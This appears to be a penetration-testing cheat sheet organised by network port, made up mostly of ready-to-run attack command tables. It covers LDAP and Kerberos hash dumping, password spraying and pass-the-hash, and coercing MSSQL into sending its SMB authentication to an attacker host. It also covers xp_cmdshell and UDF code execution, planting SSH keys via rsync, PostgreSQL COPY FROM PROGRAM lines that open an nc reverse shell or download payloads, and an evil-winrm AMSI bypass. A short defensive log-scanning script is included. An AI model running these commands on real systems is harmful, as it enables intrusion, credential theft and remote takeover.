| Authenticate as user (simple bind) | `ldapsearch -H ldap://<ip> -x -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>'` |
| Retrieve naming contexts | `ldapsearch -H ldap://<ip> -x -s base -b '' namingcontexts` |
| Dump a naming context | `ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(objectClass=*)'` |
| Query with filter (template) | `ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '<LDAP filter>'` |
| All people (common attrs) | `ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(objectClass=person)' sAMAccountName memberOf` |
| Single user by sAMAccountName | `ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(&(objectClass=user)(sAMAccountName=<user>))' sAMAccountName memberOf pwdLastSet` |
| Domain Admins members | `ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=<x>,DC=<y>))' sAMAccountName` |
| (Alt) Direct LDAPS | `ldapsearch -H ldaps://<ip> -x -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>'` |
- Triage a dump by attribute frequency to spot unusual attributes (descriptions, scripts, custom fields): `awk '{print $1}' <ldap_dump.ldif> | sort | uniq -c | sort -nr`
- If a simple bind fails with `ldap_bind: Strong(er) authentication required (8)`, the DC requires signing or an encrypted channel for simple binds; bind over TLS instead:
| Action | Command |
| --- | --- |
| Fetch server certificate | `echo -n \| openssl s_client -connect <dc_fqdn>:636 \| sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ldapserver.pem` |
| Trust cert for ldap-tools | `echo 'TLS_CACERT <path>/ldapserver.pem' \| sudo tee -a /etc/ldap/ldap.conf` |
| Re-run with STARTTLS | `ldapsearch -H ldap://<ip> -x -Z -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>'` |
nxc
- Fast AD LDAP enumeration (users/groups/computers, policy, roastable accounts). Target a DC for best results.
| Action | Command |
| --- | --- |
| Anonymous bind check (user enum) | `nxc ldap <dc_ip> -u '' -p '' --users` |
| Enumerate users | `nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --users` |
| Enumerate groups | `nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --groups` |
| Enumerate computers | `nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --computers` |
| Password policy | `nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --password-policy` |
| List SPNs | `nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --spns` |
| Kerberoast (dump hashes) | `nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --kerberoast kerberoast.txt` |
| AS-REP roast (no-preauth users) | `nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --asreproast asrep.txt` |
Notes: Works against Windows DCs and Samba AD DCs; may work against domain-joined members but is policy-dependent. Use valid creds; anonymous often fails in modern domains.
443 TCP - HTTPS
sslscan
- Quick cipher/protocol/certificate survey.
| Action | Command |
| --- | --- |
| Quick scan | `sslscan <host>:443` |
| Show only accepted suites | `sslscan --no-failed <host>:443` |
| Save XML report | `sslscan --xml=sslscan.xml <host>:443` |
testssl.sh
- Deeper checks (protocols, ciphers, known TLS weaknesses), good for internal hosts. The binary is `testssl` on Kali and `testssl.sh` when run from the upstream checkout.
| Action | Command |
| --- | --- |
| Quick scan | `testssl <host>:443` |
| Faster overview | `testssl --fast <host>:443` |
| Save JSON report | `testssl --jsonfile out.json <host>:443` |
SSL Labs
- External grading (internet-reachable hosts only). Use the web UI or the CLI; note that the target is scanned from Qualys' infrastructure, so do not point it at hosts that should stay unadvertised.
| Action | Command |
| --- | --- |
| Check using website | `https://www.ssllabs.com/ssltest/analyze.html?d=<host>` |
| Check using CLI tool | `ssllabs-scan --usecache --quiet <host>` |
445 TCP – SMB
Enumerate Samba Version
- Wireshark: start a capture, log in anonymously with `smbclient -L \\<ip address>`, then look for the packet with "Session Setup AndX Response" in the Info field; its Native LAN Manager string carries the Samba version. This only appears when SMB1 is negotiated, so add `-m NT1` if the client picks SMB2/3.
- ngrep & smbclient: terminal 1: `ngrep -i -d <iface> 's.?a.?m.?b.?a.*[[:digit:]]' port 139`; terminal 2: `echo exit | smbclient -L <ip address>`
464 TCP & UDP - kpasswd5
- Kerberos v5 password change/reset service on AD domain controllers (TCP/UDP 464). Implements the RFC 3244 "Change/Set Password" protocol via the `kadmin/changepw` service, allowing users to change their own (including expired) passwords and admins to reset others, with domain policy enforcement. Typically invoked by `kpasswd` or automatically during `kinit` when a change is required.
500 UDP – ISAKMP / IKE
- IKE (Internet Key Exchange) negotiates IPsec Security Associations (SAs) and keys within the ISAKMP framework on UDP 500 (and UDP 4500 for NAT-Traversal).
- IPsec data planes:
- AH (integrity, origin, anti-replay)
- ESP (adds confidentiality).
- Modes:
- Transport (encrypts payload)
- Tunnel (encapsulates whole IP packet).
- Versions:
- IKEv1 (Main/Aggressive)
- IKEv2 (simplified handshake, better NAT/mobility).
- Auth typically via PSK or certificates.
ike-scan
| Action | Command |
| --- | --- |
| Probe IKE (v1, Main Mode) | `ike-scan -M <ip>` |
| Probe IKE (v1, Aggressive Mode) | `ike-scan -A <ip>` |
| Probe IKEv2 | `ike-scan --ikev2 <ip>` |
| Show transforms/auth methods (verbose) | `ike-scan -M -v <ip>` |
| Capture Aggressive Mode exchange for PSK cracking | `ike-scan -A --id=<group_id> --pskcrack=ike.txt <ip>` |
| Crack PSK offline (dictionary) | `psk-crack --dictionary <wordlist> ike.txt` |
- Aggressive Mode sends the PSK-derived hash before the peer is authenticated, which is what `--pskcrack` captures; many gateways only answer when the supplied `--id` matches a configured group name, so try known or guessed IDs if `-A` alone gets no response. Main Mode does not leak the hash.
636 TCP - LDAPS
873 TCP - rsync
Commands
| Action | Command |
| --- | --- |
| Enumerate shares (daemon) | `rsync <ip>::` |
| Enumerate shares (alt URL) | `rsync rsync://<ip>/` |
| List files in a share | `rsync <ip>::<share>` |
| Download remote file (daemon) | `rsync rsync://<ip>/<share>/<remote_file> <local_dir>/` |
| Download remote directory (daemon) | `rsync -av rsync://<ip>/<share>/<remote_dir>/ <local_dir>/` |
| Download with custom port/user (daemon) | `rsync -av rsync://<user>@<ip>:<port>/<share>/ <local_dir>/` |
| Upload local file (daemon) | `rsync <local_file> rsync://<user>@<ip>/<share>/<remote_dir>/` |
| Upload local directory (daemon) | `rsync -av <local_dir>/ rsync://<user>@<ip>/<share>/<remote_dir>/` |
| Upload local .ssh directory (example: plant an authorized key in a writable home share) | `rsync -av ./.ssh/ rsync://<ip>/<share>/` |
| Over SSH on non-22 port | `rsync -a -e "ssh -p <port>" <local_dir>/ <user>@<ip>:<remote_dir>/` |
1433 TCP – Microsoft SQL
- Microsoft SQL Server default service (SQL and Windows authentication). Good resource: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Commands
| Action | Command |
| --- | --- |
| Run shell command | `EXEC xp_cmdshell '<command>';` |
| Enable xp_cmdshell | `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;` |
| View databases | `SELECT name FROM master.dbo.sysdatabases;` |
| Select/use a database | `USE <db>;` |
| Get table names | `SELECT * FROM <db>.INFORMATION_SCHEMA.TABLES;` |
| Get table names (legacy catalog) | `SELECT name FROM sysobjects WHERE xtype = 'U';` |
| List linked servers | `EXEC sp_linkedservers;` |
| List linked servers (catalog view) | `SELECT * FROM sys.servers;` |
| List users | `SELECT sp.name AS login, sp.type_desc AS login_type, sl.password_hash, sp.create_date, sp.modify_date, CASE WHEN sp.is_disabled = 1 THEN 'Disabled' ELSE 'Enabled' END AS status FROM sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id WHERE sp.type NOT IN ('G','R') ORDER BY sp.name;` |
| Create user with sysadmin privs | `CREATE LOGIN <username> WITH PASSWORD = '<password>'; EXEC sp_addsrvrolemember '<username>', 'sysadmin';` |
| View password hashes | `SELECT name, password_hash FROM master.sys.sql_logins;` |
| View permissions | `SELECT * FROM fn_my_permissions(NULL, 'SERVER');` |
nxc
| Action | Command |
| --- | --- |
| Spray passwords (SQL auth) | `nxc mssql <target_or_cidr> -u <user_or_list> -p <pass_or_list>` |
| Windows auth login | `nxc mssql <ip> -d <domain> -u <user> -p '<pass>'` |
| Windows auth with NTLM hash | `nxc mssql <ip> -d <domain> -u <user> -H <NTHASH>` |
| Run OS command via xp_cmdshell | `nxc mssql <ip> -u <user> -p '<pass>' -x "whoami"` |
| Run an ad-hoc SQL query | `nxc mssql <ip> -u <user> -p '<pass>' -q "SELECT @@version"` |
| Check if xp_cmdshell is enabled | `nxc mssql <ip> -u <user> -p '<pass>' -q "SELECT CAST(value_in_use AS INT) FROM sys.configurations WHERE name='xp_cmdshell'"` |
| Enable xp_cmdshell | `nxc mssql <ip> -u <user> -p '<pass>' -q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;"` |
| Trigger SMB auth (capture NetNTLMv2) | `nxc mssql <ip> -u <user> -p '<pass>' -q "EXEC master..xp_dirtree '\\\\<attacker_ip>\\<share>'"` |
| Specify non-default port | `nxc mssql <ip> --port <port> -u <user> -p '<pass>'` |
impacket-mssqlclient
| Action | Command |
| --- | --- |
| Login (SQL auth) | `mssqlclient <user>:<password>@<ip>` |
| Login (Windows auth) | `mssqlclient <domain>/<user>:<password>@<ip> -windows-auth` |
| Enable xp_cmdshell (helper) | `enable_xp_cmdshell` |
| Run shell command (helper) | `xp_cmdshell <command>` |
| Enable xp_cmdshell (T-SQL one-liner) | `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;` |
| Run shell command (T-SQL) | `EXEC xp_cmdshell '<command>';` |
Attack Path
- Capture the SQL service account's SMB authentication. Unlike `xp_cmdshell`, `xp_dirtree` is callable by ordinary logins, so this works without sysadmin:
  - Start Responder on the interface facing the target (tun0) so its SMB listener answers the connection.
  - Make the server authenticate to Responder and capture the Net-NTLMv2 hash: `EXEC master.dbo.xp_dirtree '\\<attacker_ip>\<share>';`
  - Crack the captured Net-NTLMv2 hash: `hashcat -m 5600 <hash_file> <wordlist>`
1521 TCP – Oracle TNS Listener
- Oracle Transparent Network Substrate (TNS) listener for Oracle Database. Handles client connection negotiation and service/SID routing; common target for SID discovery and auth brute force.
Commands
| Action | Command |
| --- | --- |
| View privileges | `SELECT * FROM session_privs;` |
| View roles | `SELECT * FROM user_role_privs;` |
| Read file (UTL_FILE) | See snippet below |
| Write file (UTL_FILE) | See snippet below |
| Run last PL/SQL block | `/` |
| Enable output | `SET SERVEROUTPUT ON` |
Read a File
```sql
declare
  f utl_file.file_type;
  s varchar(400);
begin
  -- first argument is the location: a DIRECTORY object name, or a raw path only if UTL_FILE_DIR is set
  f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
  utl_file.get_line(f, s);   -- reads one line; loop until NO_DATA_FOUND for the whole file
  utl_file.fclose(f);
  dbms_output.put_line(s);
end;
/
```
Write a File
```sql
declare
  f utl_file.file_type;
  s varchar(5000) := '<insert text to write>';
begin
  f := utl_file.fopen('/inetpub/wwwroot', '<file to write>', 'W');
  utl_file.put_line(f, s);
  utl_file.fclose(f);
end;
/
```
- Both blocks run as the database's OS account, so the target path must be readable/writable by it, and the session needs execute on `UTL_FILE`.
odat
- Requires the Oracle Instant Client (sqlplus) installed and reachable in $PATH.
| Action | Command |
| --- | --- |
| Enumerate SIDs | `odat sidguess -s <ip> -p <port>` |
| Brute-force credentials | `odat passwordguesser -s <ip> -d <service> -U <user_or_list> -P <pass_or_list>` |
| All-in-one checks (authenticated) | `odat all -s <ip> -d <service> -U <user> -P <pass>` |
| Authenticate as SYSDBA (flag) | `--sysdba` |
| Upload file via DBMS_ADVISOR | `odat dbmsadvisor -s <ip> -d <service> -U <user> -P <pass> --sysdba --putFile C:\\inetpub\\wwwroot <remote_file> <local_file>` |
| Upload file via DBMS_XSLPROCESSOR | `odat dbmsxslprocessor -s <ip> -d <service> -U <user> -P <pass> --sysdba --putFile C:\\inetpub\\wwwroot <remote_file> <local_file>` |
Metasploit
| Action | Command |
| --- | --- |
| SID brute | `msfconsole -q -x "use auxiliary/scanner/oracle/sid_brute; set RHOSTS <ip>; set RPORT 1521; run; exit"` |
| Login brute | `msfconsole -q -x "use auxiliary/scanner/oracle/oracle_login; set RHOSTS <ip>; set RPORT 1521; set SID <sid>; run; exit"` |
sqlplus
| Action | Command |
| --- | --- |
| Login | `sqlplus64 <user>/<password>@<ip>:<port>/<service>` |
| Login as SYSDBA | `sqlplus64 <user>/<password>@<ip>:<port>/<service> as sysdba` |
Resources:
- Oracle DB exploit guide - blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
- Metasploit for Oracle - blog.zsec.uk/msforacle/
2049 TCP / mountd (NFS)
- NFS server daemon (`nfsd`) for Unix/Linux file sharing. NFSv4 typically uses only 2049; NFSv3 also relies on additional RPC services (e.g., `mountd`, lock and quota daemons) discovered via `rpcbind` on 111.
showmount
| Action | Command |
| --- | --- |
| Show exported paths | `showmount -e <ip>` |
| Show clients using exports | `showmount -a <ip>` |
mount
| Action | Command |
| --- | --- |
| Create local mount point | `sudo mkdir -p /mnt/<dir>` |
| Mount NFSv3 export | `sudo mount -t nfs -o vers=3 <ip>:<export> /mnt/<dir>` |
| Mount NFSv4 export | `sudo mount -t nfs4 <ip>:/<export> /mnt/<dir>` |
| Unmount (forced/lazy) | `sudo umount -lf /mnt/<dir>` |
nmap (NFS)
- The `nfs-*` scripts key off rpcbind, so include 111 in the port list or they never trigger.
| Action | Command |
| --- | --- |
| Enumerate exports via NSE | `nmap -p 111,2049 --script nfs-showmount <ip>` |
| List files on export | `nmap -p 111,2049 --script nfs-ls --script-args nfs-ls.root=/,nfs.version=3 <ip>` |
| Get filesystem stats | `nmap -p 111,2049 --script nfs-statfs <ip>` |
3000 TCP – Express.js / Node (HTTP)
- Common development HTTP port for Node.js apps (Express, Next.js, React dev server).
- 9229 TCP – Node.js Inspector (remote debugging)
3268 TCP - LDAP (Global Catalog)
- Forest-wide, read-only search endpoint on GC servers; returns only attributes in the Partial Attribute Set. Use 389/636 on a domain DC for full attributes or modifications. LDAPS to the GC: 3269/TCP.
3269 TCP - LDAPS (Global Catalog)
- Forest-wide LDAP over SSL/TLS to GC servers. Supports searches without referrals but returns only attributes in the Partial Attribute Set. For full attributes or modifications, query a domain DC on 636 (LDAPS) or 389 (LDAP).
3306 TCP – MySQL
- MySQL server default TCP port (SQL protocol over TCP).
Attack Paths
RCE via UDF upload
- Place a malicious shared library in `plugin_dir` and run `CREATE FUNCTION ... SONAME ...`; invoking the UDF can execute OS commands.
- Requirements: ability to write to `plugin_dir` (directly or via `SELECT ... INTO DUMPFILE`) and privilege to create UDFs (`CREATE FUNCTION`).
- Notes: the library must match the server OS/architecture; `secure_file_priv` may restrict file writes (empty = unrestricted, a path = only that directory, NULL = disabled); UDFs persist until `DROP FUNCTION`.
- Mitigations: lock down `plugin_dir`, restrict `CREATE FUNCTION`, set `secure_file_priv`, avoid running `mysqld` as root.
| Action | Command |
| --- | --- |
| Show plugin directory | `SHOW VARIABLES LIKE 'plugin_dir';` |
| Verify privileges | `SHOW GRANTS;` |
| List installed UDFs (legacy) | `SELECT * FROM mysql.func;` |
| Create UDF from library (`.so` on Linux, `.dll` on Windows) | `CREATE FUNCTION <udf_name> RETURNS INTEGER SONAME '<library>';` |
| Use UDF (example) | `SELECT <udf_name>('<arg>');` |
| Drop UDF | `DROP FUNCTION <udf_name>;` |
Commands
| Action | Command |
| --- | --- |
| Show variables | `SHOW VARIABLES;` |
| Show user privileges | `SHOW GRANTS;` |
| Show individual variable | `SELECT @@<variable>;` |
| Show plugins directory | `SHOW VARIABLES LIKE '%plugin_dir%';` |
| Show databases | `SHOW DATABASES;` |
| Select/use a database | `USE <database>;` |
| Show server version | `SELECT @@version;` |
| Show current user | `SELECT USER();` |
| List tables in a DB | `SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='<db>';` |
| List columns for a table | `SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='<table>';` |
| Select username and password columns | `SELECT username, password FROM <table>;` |
| Show all columns/records in users | `SELECT * FROM users;` |
| Show username where id=1 | `SELECT username FROM users WHERE id=1;` |
| Load data from local file into table | `LOAD DATA LOCAL INFILE '/path/file.csv' INTO TABLE <table> FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';` |
| Change cell contents | `UPDATE <Table> SET <Column>='<Value>' WHERE <Column>='<Value>';` |
| Create database | `CREATE DATABASE <name>;` |
| Insert row into table | `INSERT INTO <table>(<col1>,<col2>) VALUES ('<val1>','<val2>');` |
| Create user | `CREATE USER '<username>'@'<host>' IDENTIFIED BY '<password>';` |
| Grant all permissions to user | `GRANT ALL ON <database>.* TO '<user>'@'<host>';` |
| Limit results | `SELECT * FROM <table> LIMIT <number>;` |
| Set binary variable | `SET @<var> = 0x<hex>;` |
| Output variable to server file | `SELECT @<var> INTO DUMPFILE '/path/something.bin';` |
| Info about tables/databases | `SELECT * FROM INFORMATION_SCHEMA.TABLES;` |
| Check column collation | `SELECT COLLATION_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='<table>' AND COLUMN_NAME='<column>';` |
| Select with explicit collation | `SELECT <column> COLLATE <collation> FROM <table>;` |
mysql
| Action | Command |
| --- | --- |
| Connect (TCP) | `mysql --host=<ip> --port=3306 --user=<user> -p<password>` |
| Connect and run one query | `mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT VERSION();"` |
| List databases | `mysql -h <ip> -P 3306 -u <user> -p<password> -e "SHOW DATABASES;"` |
| List tables in a DB | `mysql -h <ip> -P 3306 -u <user> -p<password> -e "USE <db>; SHOW TABLES;"` |
| Current user | `mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT USER();"` |
| Check secure_file_priv | `mysql -h <ip> -P 3306 -u <user> -p<password> -e "SHOW VARIABLES LIKE 'secure_file_priv';"` |
| Read server file (LOAD_FILE; needs FILE privilege and a path allowed by secure_file_priv) | `mysql -h <ip> -P 3306 -u <user> -p<password> -e "SELECT LOAD_FILE('/etc/passwd');"` |
| Enable LOCAL INFILE (client) | `mysql --local-infile=1 -h <ip> -P 3306 -u <user> -p<password>` |
| Import CSV via LOCAL INFILE | `mysql --local-infile=1 -h <ip> -P 3306 -u <user> -p<password> -e "LOAD DATA LOCAL INFILE 'data.csv' INTO TABLE <db>.<table> FIELDS TERMINATED BY ',' ENCLOSED BY '\"' LINES TERMINATED BY '\n';"` |
- `-p<password>` with no space puts the password in shell history and process listings; omit the value to be prompted instead.
mysqldump
| Action | Command |
| --- | --- |
| Dump one database | `mysqldump -h <ip> -P 3306 -u <user> -p<password> <db> > dump.sql` |
| Dump all databases | `mysqldump -h <ip> -P 3306 -u <user> -p<password> --all-databases > all.sql` |
nmap (MySQL NSE)
| Action | Command |
| --- | --- |
| Fingerprint and basic enum | `nmap -sV -p 3306 --script mysql-enum <ip>` |
| Enumerate users (needs creds) | `nmap -p 3306 --script mysql-users --script-args mysqluser=<user>,mysqlpass=<pass> <ip>` |
| Audit with policy file (nmap ships `nselib/data/mysql-cis.audit`) | `nmap -p 3306 --script mysql-audit --script-args mysql-audit.username=<user>,mysql-audit.password=<pass>,mysql-audit.filename=<policy.audit> <ip>` |
Resources
3389 TCP – RDP
- Windows Remote Desktop Protocol. Prefer xfreerdp (actively maintained; supports NLA/TLS, clipboard/drive redirection). rdesktop is legacy and may fail against modern NLA setups.
nxc
- Credential validation against RDP/NLA without opening a GUI session (use `xfreerdp` for interactive access). Check the domain lockout policy before spraying.
| Action | Command |
| --- | --- |
| Check login (password spray) | `nxc rdp <target_or_cidr> -u <user_or_list> -p '<pass_or_list>'` |
| Domain auth | `nxc rdp <ip> -d <domain> -u <user> -p '<pass>'` |
| Pass-the-hash | `nxc rdp <ip> -u <user> -H <NTHASH>` |
| Kerberos (ticket from KRB5CCNAME) | `nxc rdp <fqdn> -u <user> -k --use-kcache` |
| Non-default port | `nxc rdp <ip> --port <port> -u <user> -p '<pass>'` |
| Show NLA status in host banner (no creds needed) | `nxc rdp <target>` |
| Prove NLA disabled (unauth screenshot of login UI) | `nxc rdp <target> --nla-screenshot` |
| Capture desktop after auth (evidence) | `nxc rdp <target> -u <user> -p '<password>' --screenshot --screentime 10` |
| Sweep a range for NLA-off hosts (save screenshots) | `nxc rdp <cidr> --nla-screenshot --res 1280x720` |
xfreerdp
- RDP client, preferred over rdesktop.
| Action | Command |
| --- | --- |
| Connect | `xfreerdp /v:<ip>:3389 /u:<user> /p:'<pass>' /cert:ignore` |
| Domain auth | `xfreerdp /v:<ip> /u:<user> /p:'<pass>' /d:<domain> /cert:ignore` |
| Fullscreen | `xfreerdp /v:<ip> /u:<user> /p:'<pass>' /f` |
| Dynamic resolution | `xfreerdp /v:<ip> /u:<user> /p:'<pass>' /dynamic-resolution` |
| Map local folder | `xfreerdp /v:<ip> /u:<user> /p:'<pass>' /drive:loot,<local_path>` |
| Enable clipboard | `xfreerdp /v:<ip> /u:<user> /p:'<pass>' +clipboard` |
| Force TLS (no NLA) | `xfreerdp /v:<ip> /u:<user> /p:'<pass>' /sec:tls /cert:ignore` |
| Force Standard RDP (legacy) | `xfreerdp /v:<ip> /u:<user> /p:'<pass>' /sec:rdp` |
rdesktop
| Action | Command |
| --- | --- |
| Connect | `rdesktop -u <user> -p '<pass>' <ip>` |
| Domain auth | `rdesktop -u <user> -p '<pass>' -d <domain> <ip>` |
| Fullscreen | `rdesktop -f -u <user> -p '<pass>' <ip>` |
| Set resolution | `rdesktop -g 1920x1080 -u <user> -p '<pass>' <ip>` |
| Map local folder | `rdesktop -r disk:loot=<local_path> -u <user> -p '<pass>' <ip>` |
3690 TCP - SVN
svn
| Action | Command |
| --- | --- |
| List repository contents | `svn list svn://<ip>` |
| Checkout working copy | `svn checkout svn://<ip>` |
| Show commit history | `svn log` |
| Update to a specific revision | `svn update -r <revision>` |
5432 TCP - Postgresql
Commands
| Action | Command |
| --- | --- |
| Connect to database | `psql -h <ip> -U <user> -d <db>` |
| Connect with a URI | `psql postgresql://<username>:<password>@<host>/<db>` |
| List databases | `\list` (or `\l`) |
| Use/switch database | `\c <db>` |
| List tables | `\dt` (`\d <table>` describes one table) |
| Get user roles (verbose) | `\du+` |
| Check if current user is superuser | `SELECT rolsuper FROM pg_roles WHERE rolname = current_user;` |
| Browse server data directory | `SELECT pg_ls_dir('./');` |
| List /etc directory | `SELECT pg_ls_dir('/etc');` |
| Read server file contents | `SELECT pg_read_file('/etc/passwd', 0, 100000);` |
| Copy file contents into table | `CREATE TABLE <table>(content text); COPY <table> FROM '/path/to/file'; SELECT * FROM <table>;` |
| Copy file into TEMP table (alt) | `CREATE TEMP TABLE <table>(content text); COPY <table> FROM $$C:\\path\\file.txt$$; SELECT content FROM <table>; DROP TABLE <table>;` |
| Dump table to server file | `COPY <table> TO '/path/to/file.txt';` |
| Write literal text to file | `COPY (SELECT $$<text>$$) TO '/path/to/file.txt';` |
| Base64 decode → file | `COPY (SELECT decode($$dGVzdGluZzEyMw==$$, $$base64$$)) TO $$C:\\test.bin$$;` |
| Base64 decode → UTF-8 text file | `COPY (SELECT convert_from(decode($$dGVzdGluZzEyMw==$$, $$base64$$), $$utf-8$$)) TO $$C:\\test.txt$$;` |
- `pg_ls_dir`, `pg_read_file` and server-side `COPY` run as the postgres OS account and need superuser or the `pg_read_server_files` / `pg_write_server_files` roles.
- Text-format `COPY` writes a `bytea` value as its `\x...` hex representation, not raw bytes, so the `decode` variant does not produce a binary file; use the `convert_from` variant for text content.
Attack Paths
Code Execution — C UDF/DLL
- Load a native library and expose an exported C symbol as a SQL function, then call it.
- Prereqs: superuser (or equivalent), a library file readable by the server account, and matching bitness (x64 vs x86).
- Paths: absolute paths work; otherwise the file must be in `dynamic_library_path`.
RCE — COPY ... PROGRAM (built-in, privilege-gated)
- Built-in PostgreSQL feature, not an exploit. With superuser (or membership in the `pg_execute_server_program` role), the server can run OS commands and pipe stdout into a table.
- Minimal footprint: use a TEMP table so artifacts drop at session end.
| Action | Command |
|---|---|
| Verify privilege | `SELECT current_user, rolsuper FROM pg_roles WHERE rolname = current_user;` |
| Create temp results table | `CREATE TEMP TABLE cmd_exec(cmd_output text);` |
| PoC (Linux) | `COPY cmd_exec FROM PROGRAM 'whoami';` |
| PoC (Windows) | `COPY cmd_exec FROM PROGRAM 'cmd.exe /c whoami';` |
| Read output | `SELECT * FROM cmd_exec;` |
| Reverse shell (Linux, if nc present) | `COPY cmd_exec FROM PROGRAM 'nc -n <ip> <port> -e /bin/bash';` |
| Download file (Linux) | `COPY cmd_exec FROM PROGRAM 'curl -s -o /tmp/payload http://<ip>/payload';` |
| Download file (Windows) | `COPY cmd_exec FROM PROGRAM 'powershell -NoP -W Hidden -C "iwr http://<ip>/payload -OutFile C:\Windows\Temp\payload.exe"';` |
- Commands run on the DB host as the PostgreSQL service account; no interactive prompts.
- Managed/cloud PostgreSQL often disables PROGRAM. Use absolute paths if PATH is constrained.
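On the defender's side, the chains in this section leave clear traces in the statement log. The following is an added example (not from the original page) that scans PostgreSQL log lines for `COPY ... FROM PROGRAM`, server-side file reads and writes, and native C function creation; it assumes `log_statement = 'all'` and a `log_line_prefix` of `'%m [%p] %u@%d '`, and the log lines are constructed.

```python
import re

# Constructed sample of postgresql.log with log_statement = 'all' and a
# log_line_prefix of '%m [%p] %u@%d ' (both assumptions; adjust PG_LOG_RE to yours).
SAMPLE_PG_LOG = """\
2024-05-01 10:00:01.000 UTC [4242] app@appdb LOG:  statement: SELECT id FROM orders WHERE id = 7;
2024-05-01 10:00:02.000 UTC [4242] app@appdb LOG:  statement: SELECT current_user, rolsuper FROM pg_roles WHERE rolname = current_user;
2024-05-01 10:00:03.000 UTC [4242] app@appdb LOG:  statement: CREATE TEMP TABLE cmd_exec(cmd_output text);
2024-05-01 10:00:04.000 UTC [4242] app@appdb LOG:  statement: COPY cmd_exec FROM PROGRAM 'id';
2024-05-01 10:00:05.000 UTC [4242] app@appdb LOG:  statement: SELECT pg_read_file('/etc/passwd', 0, 100000);
2024-05-01 10:00:06.000 UTC [4243] svc@appdb LOG:  statement: COPY (SELECT 'x') TO '/tmp/out.txt';
""".splitlines()

PG_LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$"
)

# Ordered rules; the first match labels the statement. Each maps to an attack path above.
RULES = (
    (re.compile(r"\bFROM\s+PROGRAM\b", re.I), "COPY FROM PROGRAM (OS command execution)"),
    (re.compile(r"\bCOPY\b.*\bTO\s+('|\$\$)", re.I | re.S), "COPY ... TO file (server-side file write)"),
    (re.compile(r"\bpg_read_file\s*\(|\bpg_ls_dir\s*\(|\bCOPY\b.*\bFROM\s+('|\$\$)", re.I | re.S),
     "server file read/listing"),
    (re.compile(r"\bCREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+C\b", re.I | re.S),
     "native C UDF creation"),
)


def scan_pg_log(lines):
    """Return (user, db, label, sql) for every logged statement that matches a rule."""
    hits = []
    for line in lines:
        m = PG_LOG_RE.match(line.rstrip())
        if not m:
            continue  # continuation lines, connection/checkpoint messages, etc.
        sql = m["sql"]
        for pattern, label in RULES:
            if pattern.search(sql):
                hits.append((m["user"], m["db"], label, sql))
                break
    return hits


if __name__ == "__main__":
    for user, db, label, sql in scan_pg_log(SAMPLE_PG_LOG):
        print(f"{label:45} {user}@{db}: {sql}")
```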
5985 TCP – WinRM
- Windows Remote Management (WS-Management over HTTP). Enables remote command execution and PowerShell remoting. Default auth is Negotiate (Kerberos/NTLM) with message-level encryption; Basic over HTTP indicates weak configuration. Prefer 5986/HTTPS in production.
curl
| Action | Command |
|---|---|
| Fingerprint endpoint (401 expected) | `curl -sI http://<ip>:5985/wsman` |
| Check auth methods | `curl -sI http://<ip>:5985/wsman \| grep -i 'www-authenticate'` |
nmap
| Action | Command |
|---|---|
| Nmap WinRM probe | `nmap -p 5985 --script http-windows-remote-management <ip>` |
nxc
| Action | Command |
|---|---|
| Validate creds / spray | `nxc winrm <target_or_cidr> -u <user_or_list> -p '<pass_or_list>'` |
| Domain auth | `nxc winrm <ip> -d <domain> -u <user> -p '<pass>'` |
| Kerberos (ccache) | `nxc winrm <fqdn> -k` |
| Pass-the-hash | `nxc winrm <ip> -u <user> -H <NTHASH>` |
| Run CMD | `nxc winrm <ip> -u <user> -p '<pass>' -x "whoami /all"` |
| Run PowerShell | `nxc winrm <ip> -u <user> -p '<pass>' -X "Get-LocalUser"` |
evil-winrm (interactive)
| Action | Command |
|---|---|
| Shell (HTTP) | `evil-winrm -i <ip> -u <user> -p '<pass>'` |
| Shell (HTTPS 5986) | `evil-winrm -S -i <ip> -P 5986 -u <user> -p '<pass>'` |
| Shell with client cert (HTTPS) | `evil-winrm -S -i <ip> -P 5986 -u <user> -p '<pass>' -k <private_key> -c <certificate>` |
| Show menu (in-session) | `menu` |
| AMSI bypass (in-session) | `Bypass-4MSI` |
| Run local EXE in-memory (in-session) | `Invoke-Binary <path_to_local_exe>` |
| Upload file (in-session) | `upload <local_path> <remote_path>` |
| Download file (in-session) | `download <remote_path> <local_path>` |
Notes
